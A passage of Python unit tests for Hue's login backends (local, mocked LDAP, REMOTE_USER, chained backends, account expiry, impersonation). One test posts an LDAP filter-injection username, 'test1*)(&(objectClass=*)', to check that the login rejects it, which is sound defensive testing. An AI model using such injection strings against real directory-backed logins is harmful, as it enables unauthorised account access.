User.objects.all().delete()
for finish in self.reset:
finish()
if self.cluster.fs.do_as_user(self.test_username, self.cluster.fs.exists, "/user/%s" % self.test_username):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)
def test_login(self):
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
response = self.c.post('/hue/accounts/login/', dict(username=self.test_username, password="foo"))
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(response.url, "/")
assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))
def test_login_old(self):
response = self.c.get('/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
response = self.c.post('/accounts/login/', dict(username=self.test_username, password="foo"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))
response = self.c.get('/accounts/login/')
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(response.url, "/")
def test_login_home_creation_failure(self):
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
# Create home directory as a file in order to fail in the home creation later
cluster = pseudo_hdfs4.shared_cluster()
fs = cluster.fs
assert_false(cluster.fs.exists("/user/%s" % self.test_username))
fs.do_as_superuser(fs.create, "/user/%s" % self.test_username)
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "test-hue-foo2",
}, follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true('/about' in response.content, response.content)
# Custom login process should not do 'http-equiv="refresh"' but call the correct view
# 'Could not create home directory.' won't show up because the messages are consumed before
def test_login_expiration(self):
    """A stale last_login past AUTH.EXPIRES_AFTER deactivates the account; re-activating restores access."""
    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "test-hue-foo2",
    }, follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")

    # Make the account look expired: 10000s window, last login a year in the past.
    self.reset.append(conf.AUTH.EXPIRES_AFTER.set_for_testing(10000))
    user = User.objects.get(username=self.test_username)
    user.last_login = datetime.datetime.now() + datetime.timedelta(days=-365)
    user.save()

    # Deactivate user
    old_settings = settings.ADMINS
    settings.ADMINS = []  # No admins configured, so the message has no mailto link.
    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "test-hue-foo2",
    }, follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_true("Account deactivated. Please contact an administrator." in response.content, response.content)
    settings.ADMINS = old_settings

    # Activate user
    user = User.objects.get(username=self.test_username)
    user.is_active = True
    user.save()

    response = self.c.post('/hue/accounts/login/', dict(username=self.test_username, password="foo"))
    assert_equal(200, response.status_code, "Expected ok status.")
class TestLdapLogin(PseudoHdfsTestBase):
  """Login flow tests for the LDAP auth backend.

  django_auth_ldap's LDAPBackend is replaced by MockLdapBackend for the class's
  lifetime so no real LDAP server is needed.
  """

  reset = []  # Config-restore callables, invoked in tearDown.
  test_username = 'test_ldap_login'

  @classmethod
  def setup_class(cls):
    # Simulate first login ever
    User.objects.all().delete()

    PseudoHdfsTestBase.setup_class()

    cls.ldap_backend = django_auth_ldap_backend.LDAPBackend
    django_auth_ldap_backend.LDAPBackend = MockLdapBackend

    # Override auth backend, settings are only loaded from conf at initialization so we can't use set_for_testing
    cls.auth_backends = settings.AUTHENTICATION_BACKENDS
    settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.LdapBackend',)

    # Need to recreate LdapBackend class with new monkey patched base class
    reload(backend)

  @classmethod
  def teardown_class(cls):
    django_auth_ldap_backend.LDAPBackend = cls.ldap_backend
    settings.AUTHENTICATION_BACKENDS = cls.auth_backends
    reload(backend)

  def setUp(self):
    self.c = Client()
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.LdapBackend']) )
    self.reset.append(conf.LDAP.LDAP_URL.set_for_testing('does not matter'))
    self.reset.append(conf.LDAP.SYNC_GROUPS_ON_LOGIN.set_for_testing(False))

  def tearDown(self):
    User.objects.all().delete()

    for finish in self.reset:
      finish()

    # Remove HDFS home directories created by the logins under test.
    if self.cluster.fs.do_as_user(self.test_username, self.cluster.fs.exists, "/user/%s" % self.test_username):
      self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)

    if self.cluster.fs.do_as_user("curly", self.cluster.fs.exists, "/user/curly"):
      self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/curly")

  def test_login(self):
    """A successful LDAP login redirects to / and creates the HDFS home directory."""
    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_false(response.context[0]['first_login_ever'])

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(response.url, "/")
    assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))

  def test_login_failure_for_bad_username(self):
    """An LDAP-filter-injection style username is rejected with the generic error message."""
    self.reset.append(conf.LDAP.LDAP_SERVERS.set_for_testing(get_mocked_config()))

    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")

    response = self.c.post('/hue/accounts/login/', dict(username="test1*)(&(objectClass=*)", password="foo"))
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_true('Invalid username or password' in response.content, response)

  def test_login_does_not_reset_groups(self):
    """Re-login keeps manually assigned groups; the default group is only re-added when empty."""
    client = make_logged_in_client(username=self.test_username, password="test")

    user = User.objects.get(username=self.test_username)
    test_group, created = Group.objects.get_or_create(name=self.test_username)
    default_group = get_default_user_group()

    user.groups.all().delete()
    assert_false(user.groups.exists())

    # No groups
    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal([default_group.name], [i for i in user.groups.values_list('name', flat=True)])

    add_to_group(self.test_username, self.test_username)

    # Two groups
    client.get('/accounts/logout')
    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(set([default_group.name, test_group.name]), set(user.groups.values_list('name', flat=True)))

    user.groups.filter(name=default_group.name).delete()
    assert_equal(set([test_group.name]), set(user.groups.values_list('name', flat=True)))

    # Keep manual group only, don't re-add default group
    client.get('/accounts/logout')
    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal([test_group.name], list(user.groups.values_list('name', flat=True)))

    user.groups.remove(test_group)
    assert_false(user.groups.exists())

    # Re-add default group
    client.get('/accounts/logout')
    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal([default_group.name], list(user.groups.values_list('name', flat=True)))

  def test_login_home_creation_failure(self):
    """Login still succeeds when a file occupies the home path, failing home creation."""
    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_false(response.context[0]['first_login_ever'])

    # Create home directory as a file in order to fail in the home creation later
    cluster = pseudo_hdfs4.shared_cluster()
    fs = cluster.fs
    assert_false(self.cluster.fs.do_as_user(self.test_username, cluster.fs.exists, "/user/%s" % self.test_username))
    fs.do_as_superuser(fs.create, "/user/%s" % self.test_username)

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "test-hue-ldap2",
        'server': "LDAP"
    }, follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_true('/about' in response.content, response.content)
    # Custom login process should not do 'http-equiv="refresh"' but call the correct view
    # 'Could not create home directory.' won't show up because the messages are consumed before

  def test_login_ignore_case(self):
    """With IGNORE_USERNAME_CASE, upper and lower case logins map to the same single user."""
    self.reset.append(conf.LDAP.IGNORE_USERNAME_CASE.set_for_testing(True))

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username.upper(),
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

    self.c.logout()

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

  def test_login_force_lower_case(self):
    """With FORCE_USERNAME_LOWERCASE, an upper case login creates one lower case user."""
    self.reset.append(conf.LDAP.FORCE_USERNAME_LOWERCASE.set_for_testing(True))

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username.upper(),
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(1, len(User.objects.all()))

    self.c.logout()

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

  def test_login_force_lower_case_and_ignore_case(self):
    """Both case options combined still resolve upper and lower case logins to one user."""
    self.reset.append(conf.LDAP.IGNORE_USERNAME_CASE.set_for_testing(True))
    self.reset.append(conf.LDAP.FORCE_USERNAME_LOWERCASE.set_for_testing(True))

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username.upper(),
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

    self.c.logout()

    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

  def test_import_groups_on_login(self):
    """With SYNC_GROUPS_ON_LOGIN, the user's LDAP group memberships are synced at login."""
    self.reset.append(conf.LDAP.SYNC_GROUPS_ON_LOGIN.set_for_testing(True))
    ldap_access.CACHED_LDAP_CONN = LdapTestConnection()
    # Make sure LDAP groups exist or they won't sync
    import_ldap_groups(ldap_access.CACHED_LDAP_CONN, 'TestUsers', import_members=False, import_members_recursive=False, sync_users=False, import_by_dn=False)
    import_ldap_groups(ldap_access.CACHED_LDAP_CONN, 'Test Administrators', import_members=False, import_members_recursive=False, sync_users=False, import_by_dn=False)

    response = self.c.post('/hue/accounts/login/', {
        'username': "curly",
        'password': "ldap1",
        'server': "TestUsers"
    })
    assert_equal(302, response.status_code, response.status_code)
    assert_equal(1, len(User.objects.all()))
    # The two LDAP groups curly is a member of, plus the default group.
    assert_equal(3, User.objects.all()[0].groups.all().count(), User.objects.all()[0].groups.all())
class TestRemoteUserLogin(PseudoHdfsTestBase):
  """Login tests for the REMOTE_USER (reverse-proxy style) auth backend."""

  reset = []  # Config-restore callables, invoked in tearDown.
  test_username = "test_remote_user_login"

  @classmethod
  def setup_class(cls):
    # Simulate first login ever
    User.objects.all().delete()

    PseudoHdfsTestBase.setup_class()

    cls.auth_backends = settings.AUTHENTICATION_BACKENDS
    settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.RemoteUserDjangoBackend',)

    # Point the middleware at the configured remote-user header; restored in teardown_class.
    cls.remote_user_middleware_header = middleware.HueRemoteUserMiddleware.header
    middleware.HueRemoteUserMiddleware.header = conf.AUTH.REMOTE_USER_HEADER.get()

  @classmethod
  def teardown_class(cls):
    middleware.HueRemoteUserMiddleware.header = cls.remote_user_middleware_header
    settings.AUTHENTICATION_BACKENDS = cls.auth_backends

  def setUp(self):
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.RemoteUserDjangoBackend']) )
    self.reset.append( conf.AUTH.REMOTE_USER_HEADER.set_for_testing('REMOTE_USER') ) # Set for middleware

    self.c = Client()

  def tearDown(self):
    for finish in self.reset:
      finish()

    User.objects.all().delete()

    # Clean up home directories for both usernames the tests may create.
    if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username):
      self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)

    if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s_%s" % (self.test_username, '2')):
      self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s_%s" % (self.test_username, '2'))

  def test_normal(self):
    """A request carrying REMOTE_USER transparently creates and logs in that user."""
    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_false(response.context[0]['first_login_ever'])

    assert_equal(0, len(User.objects.all()))

    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

  def test_ignore_case(self):
    """With IGNORE_USERNAME_CASE, differently-cased REMOTE_USER values map to one user."""
    self.reset.append( conf.AUTH.IGNORE_USERNAME_CASE.set_for_testing(True) )

    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_false(response.context[0]['first_login_ever'])

    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

    # A genuinely new (suffixed) remote user still creates a second account.
    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": "%s_%s" % (self.test_username.upper(), '2')})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(2, len(User.objects.all().order_by('username')))
    assert_equal("%s_%s" % (self.test_username, '2'), User.objects.all().order_by('username')[1].username)

    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": "%s_%s" % (self.test_username, '2')})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(2, len(User.objects.all()))
    assert_equal("%s_%s" % (self.test_username, '2'), User.objects.all().order_by('username')[1].username)

  def test_force_lower_case(self):
    """With FORCE_USERNAME_LOWERCASE, an upper case REMOTE_USER maps to the lower case user."""
    self.reset.append( conf.AUTH.FORCE_USERNAME_LOWERCASE.set_for_testing(True) )

    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_false(response.context[0]['first_login_ever'])

    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username, User.objects.all()[0].username)

  def test_ignore_case_and_force_lower_case(self):
    """Existing users keep their case; new users are lowercased when both options are on."""
    reset = conf.AUTH.FORCE_USERNAME_LOWERCASE.set_for_testing(False)
    try:
      # Seed an upper case user while lowercasing is off.
      response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
      assert_equal(200, response.status_code, "Expected ok status.")
      assert_equal(1, len(User.objects.all()))
      assert_equal(self.test_username.upper(), User.objects.all()[0].username)
    finally:
      reset()

    self.reset.append( conf.AUTH.FORCE_USERNAME_LOWERCASE.set_for_testing(True) )
    self.reset.append( conf.AUTH.IGNORE_USERNAME_CASE.set_for_testing(True) )

    # Previously existing users should not be forced to lower case.
    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(1, len(User.objects.all()))
    assert_equal(self.test_username.upper(), User.objects.all()[0].username)

    # New users should be forced to lowercase.
    response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": "%s_%s" % (self.test_username.upper(), '2')})
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_equal(2, len(User.objects.all()))
    assert_equal("%s_%s" % (self.test_username, '2'), User.objects.all().order_by('username')[1].username)
class TestMultipleBackendLogin(PseudoHdfsTestBase):
  """Login with LdapBackend chained before AllowFirstUserDjangoBackend."""

  integration = True

  reset = []  # Config-restore callables, invoked in tearDown.
  test_username = "test_multiple_login"

  @classmethod
  def setup_class(cls):
    # Simulate first login ever
    User.objects.all().delete()

    PseudoHdfsTestBase.setup_class()

    cls.ldap_backend = django_auth_ldap_backend.LDAPBackend
    django_auth_ldap_backend.LDAPBackend = MockLdapBackend

    # Override auth backend, settings are only loaded from conf at initialization so we can't use set_for_testing
    cls.auth_backends = settings.AUTHENTICATION_BACKENDS
    settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.LdapBackend','desktop.auth.backend.AllowFirstUserDjangoBackend')

    # Need to recreate LdapBackend class with new monkey patched base class
    reload(backend)

  @classmethod
  def teardown_class(cls):
    django_auth_ldap_backend.LDAPBackend = cls.ldap_backend
    settings.AUTHENTICATION_BACKENDS = cls.auth_backends
    reload(backend)

  def setUp(self):
    self.c = Client()
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.LdapBackend','desktop.auth.backend.AllowFirstUserDjangoBackend']))
    self.reset.append(conf.LDAP.LDAP_URL.set_for_testing('does not matter'))

  def tearDown(self):
    User.objects.all().delete()

    for finish in self.reset:
      finish()

    if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username):
      self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)

  def test_login_with_ldap(self):
    """A valid LDAP login through the first backend creates exactly one user."""
    ldap_access.CACHED_LDAP_CONN = LdapTestConnection()
    response = self.c.post('/hue/accounts/login/', {
        'username': "curly",
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, response.status_code)
    assert_equal(1, len(User.objects.all()))

  def test_fallback_to_db(self):
    """If the first (LDAP) backend does not authenticate, the Django DB backend is tried next."""
    ldap_access.CACHED_LDAP_CONN = LdapTestConnection()

    client = make_logged_in_client(username=self.test_username, password="test")
    client.get('/accounts/logout')
    # The lookup doubles as an implicit assertion that the user was created above
    # (User.DoesNotExist would fail the test).
    user = User.objects.get(username=self.test_username)

    response = self.c.post('/hue/accounts/login/', dict(username=self.test_username, password="foo", server="LDAP"))
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))
class TestMultipleBackendLoginNoHadoop(object):
  """Multiple-backend login tests that do not require a Hadoop cluster."""

  integration = True

  reset = []  # Config-restore callables, invoked in tearDown.
  test_username = "test_mlogin_no_hadoop"

  @classmethod
  def setup_class(cls):
    # Simulate first login ever
    User.objects.all().delete()

    cls.ldap_backend = django_auth_ldap_backend.LDAPBackend
    django_auth_ldap_backend.LDAPBackend = MockLdapBackend

    # Override auth backend, settings are only loaded from conf at initialization so we can't use set_for_testing
    cls.auth_backends = settings.AUTHENTICATION_BACKENDS
    settings.AUTHENTICATION_BACKENDS = (['desktop.auth.backend.LdapBackend', 'desktop.auth.backend.AllowFirstUserDjangoBackend'])

    # Need to recreate LdapBackend class with new monkey patched base class
    reload(backend)

  @classmethod
  def teardown_class(cls):
    django_auth_ldap_backend.LDAPBackend = cls.ldap_backend
    settings.AUTHENTICATION_BACKENDS = cls.auth_backends
    reload(backend)

  def setUp(self):
    self.c = Client()
    # NOTE(review): short class names here, unlike the fully qualified dotted paths
    # used by the sibling classes — presumably resolved by conf; confirm intentional.
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(['AllowFirstUserDjangoBackend', 'LdapBackend']) )
    self.reset.append(conf.LDAP.LDAP_URL.set_for_testing('does not matter'))

  def tearDown(self):
    User.objects.all().delete()

    for finish in self.reset:
      finish()

  def test_login(self):
    """First user registers via the local Django backend, then logs in via LDAP."""
    ldap_access.CACHED_LDAP_CONN = LdapTestConnection()

    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_true(response.context[0]['first_login_ever'])

    # First-ever login: create the account against the local (Django) backend.
    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "ldap1",
        'password1': "ldap1",
        'password2': "ldap1",
        'server': "Local"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(response.url, "/")

    self.c.get('/accounts/logout')

    # The same user can now authenticate through the LDAP backend.
    response = self.c.post('/hue/accounts/login/', {
        'username': self.test_username,
        'password': "ldap1",
        'server': "LDAP"
    })
    assert_equal(302, response.status_code, "Expected ok redirect status.")
    assert_equal(response.url, "/")
class TestLogin(PseudoHdfsTestBase):
  """General login tests with AllowFirstUserDjangoBackend, backed by a pseudo HDFS.

  NOTE(review): a second `class TestLogin(object)` defined later in this module
  shadows this one at import time, so only the later definition is visible to
  the test runner — confirm whether one of them should be renamed.
  """

  reset = []  # Config-restore callables, invoked in tearDown.
  test_username = "test_login"

  @classmethod
  def setup_class(cls):
    # Simulate first login ever
    User.objects.all().delete()

    PseudoHdfsTestBase.setup_class()

    cls.auth_backends = settings.AUTHENTICATION_BACKENDS
    settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.AllowFirstUserDjangoBackend',)

  @classmethod
  def teardown_class(cls):
    settings.AUTHENTICATION_BACKENDS = cls.auth_backends

  def setUp(self):
    self.c = Client()
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.AllowFirstUserDjangoBackend']) )

  def tearDown(self):
    for finish in self.reset:
      finish()

    User.objects.all().delete()

    if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username):
      self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)

  def test_bad_first_user(self):
    """An invalid first-ever username is rejected with a field-validation error."""
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )

    response = self.c.get('/hue/accounts/login/')
    assert_equal(200, response.status_code, "Expected ok status.")
    assert_true(response.context[0]['first_login_ever'])

    response = self.c.post('/hue/accounts/login/', dict(username="foo 1", password="foo"))
    assert_equal(200, response.status_code, "Expected ok status.")
    #assert_true('This value may contain only letters, numbers and @/./+/-/_ characters.' in response.content, response)
    assert_true('This value may contain only ' in response.content, response)

  def test_non_jframe_login(self):
    """A plain login renders the main hue.mako template."""
    client = make_logged_in_client(username=self.test_username, password="test")
    # Logout first
    client.get('/accounts/logout')
    # Login
    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
    template = 'hue.mako'
    assert_true(any([template in _template.filename for _template in response.templates]), response.content) # Go to superuser wizard

  def test_login_expiration(self):
    """ Expiration test without superusers """
    old_settings = settings.ADMINS
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )
    self.reset.append( conf.AUTH.EXPIRES_AFTER.set_for_testing(0) )
    self.reset.append( conf.AUTH.EXPIRE_SUPERUSERS.set_for_testing(False) )

    client = make_logged_in_client(username=self.test_username, password="test")
    client.get('/accounts/logout')
    user = User.objects.get(username=self.test_username)

    # Login successfully
    try:
      # Superusers are exempt from expiry (EXPIRE_SUPERUSERS is False here).
      user.is_superuser = True
      user.save()
      response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
      assert_equal(200, response.status_code, "Expected ok status.")

      client.get('/accounts/logout')

      # Login fail
      settings.ADMINS = [(self.test_username, 'test@test.com')]
      user.is_superuser = False
      user.save()
      response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
      assert_equal(200, response.status_code, "Expected ok status.")
      assert_true('Account deactivated. Please contact an <a href="mailto:test@test.com">administrator</a>' in response.content, response.content)

      # Failure should report an inactive user without admin link
      settings.ADMINS = []
      response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
      assert_equal(200, response.status_code, "Expected ok status.")
      assert_true("Account deactivated. Please contact an administrator." in response.content, response.content)
    finally:
      settings.ADMINS = old_settings

  def test_login_expiration_with_superusers(self):
    """ Expiration test with superusers """
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )
    self.reset.append( conf.AUTH.EXPIRES_AFTER.set_for_testing(0) )
    self.reset.append( conf.AUTH.EXPIRE_SUPERUSERS.set_for_testing(True) )

    client = make_logged_in_client(username=self.test_username, password="test")
    client.get('/accounts/logout')
    user = User.objects.get(username=self.test_username)

    # Login fail
    user.is_superuser = True
    user.save()
    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
    assert_equal(200, response.status_code, "Expected unauthorized status.")

  def test_modal_login(self):
    """The in-page login modal markup is present for a logged-in non-superuser."""
    c = make_logged_in_client(username='test', password='test', is_superuser=False, recreate=True)
    response = c.get('/hue')
    assert_true(b'<div id="login-modal" class="modal fade hide">' in response.content, response.content)

  def test_login_without_last_login(self):
    """A user whose last_login is NULL can still log in when expiry is enabled."""
    self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )
    self.reset.append( conf.AUTH.EXPIRES_AFTER.set_for_testing(10) )

    client = make_logged_in_client(username=self.test_username, password="test")
    client.get('/accounts/logout')
    user = User.objects.get(username=self.test_username)
    user.last_login = None
    user.save()

    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
    assert_equal(200, response.status_code, "Expected ok status.")
class TestLogin(object):
  """Hadoop-free login tests with AllowFirstUserDjangoBackend.

  NOTE(review): this redefinition shadows the earlier PseudoHdfsTestBase-based
  TestLogin in this module; confirm the shadowing is intended.
  """

  reset = []  # Config-restore callables, invoked in tearDown.
  test_username = "test_login"

  @classmethod
  def setup_class(cls):
    User.objects.all().delete() # Simulate first login ever

    cls.auth_backends = settings.AUTHENTICATION_BACKENDS
    settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.AllowFirstUserDjangoBackend',)

  @classmethod
  def teardown_class(cls):
    settings.AUTHENTICATION_BACKENDS = cls.auth_backends

  def setUp(self):
    self.c = Client()
    self.reset.append(
      conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.AllowFirstUserDjangoBackend'])
    )

  def tearDown(self):
    for finish in self.reset:
      finish()

    User.objects.all().delete()

    if Group.objects.filter(name=self.test_username).exists():
      Group.objects.filter(name=self.test_username).delete()

  def test_login_does_not_reset_groups(self):
    """Re-login must not wipe the user's (deliberately emptied) group set."""
    self.reset.append(
      conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"])
    )
    client = make_logged_in_client(username=self.test_username, password="test")
    client.get('/accounts/logout')

    user = User.objects.get(username=self.test_username)
    group, created = Group.objects.get_or_create(name=self.test_username)

    user.groups.all().delete()
    assert_false(user.groups.exists())

    # Webpack bundles not found if follow=True and running test locally
    response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"))
    assert_equal(302, response.status_code)

  def test_login_set_auth_backend_in_profile(self):
    """A successful login records the authenticating backend in the user profile."""
    client = make_logged_in_client(username=self.test_username, password="test")

    response = client.post('/hue/accounts/login/', {'username': self.test_username, 'password': 'test'})
    assert_equal(302, response.status_code)

    user = User.objects.get(username=self.test_username)
    existing_profile = get_profile(user)

    assert_equal('desktop.auth.backend.AllowFirstUserDjangoBackend', existing_profile.data['auth_backend'])

  def test_login_long_username(self):
    """Usernames within the model's max_length log in; over-long ones produce a login error."""
    self.reset.append(
      conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"])
    )
    c = Client()

    username = 'a' * 15
    user = create_user(username=username, password='test', is_superuser=False)

    response = c.post('/hue/accounts/login/', {'username': username, 'password': 'test'})
    assert_equal(302, response.status_code)

    username = 'a' * 145
    user = create_user(username=username, password='test', is_superuser=False)

    response = c.post('/hue/accounts/login/', {'username': username, 'password': 'test'})
    assert_equal(302, response.status_code)

    # 250 is currently the max in the official Django User model.
    # We can't create a previous user with more characters as the DB will truncate anyway.
    username = 'a' * 255
    response = c.post('/hue/accounts/login/', {'username': username, 'password': 'test'})
    assert_equal(200, response.status_code)
    assert_true(response.context[0]['login_errors'])
class TestImpersonationBackend(object):
  """Exercises ImpersonationBackend: authenticate as one user, act as another."""

  test_username = "test_login_impersonation"
  test_login_as_username = "test_login_as_impersonation"

  @classmethod
  def setup_class(cls):
    cls.client = make_logged_in_client(username=cls.test_username, password="test")
    # Swap in the impersonation backend; the original tuple is restored in teardown_class.
    cls.auth_backends = settings.AUTHENTICATION_BACKENDS
    settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.ImpersonationBackend',)

  @classmethod
  def teardown_class(cls):
    settings.AUTHENTICATION_BACKENDS = cls.auth_backends

  def setUp(self):
    self.reset = [conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.ImpersonationBackend'])]

  def tearDown(self):
    for restore in self.reset:
      restore()

  def test_login_does_not_reset_groups(self):
    """Logging in with login_as lands as the impersonated user."""
    self.client.get('/accounts/logout')

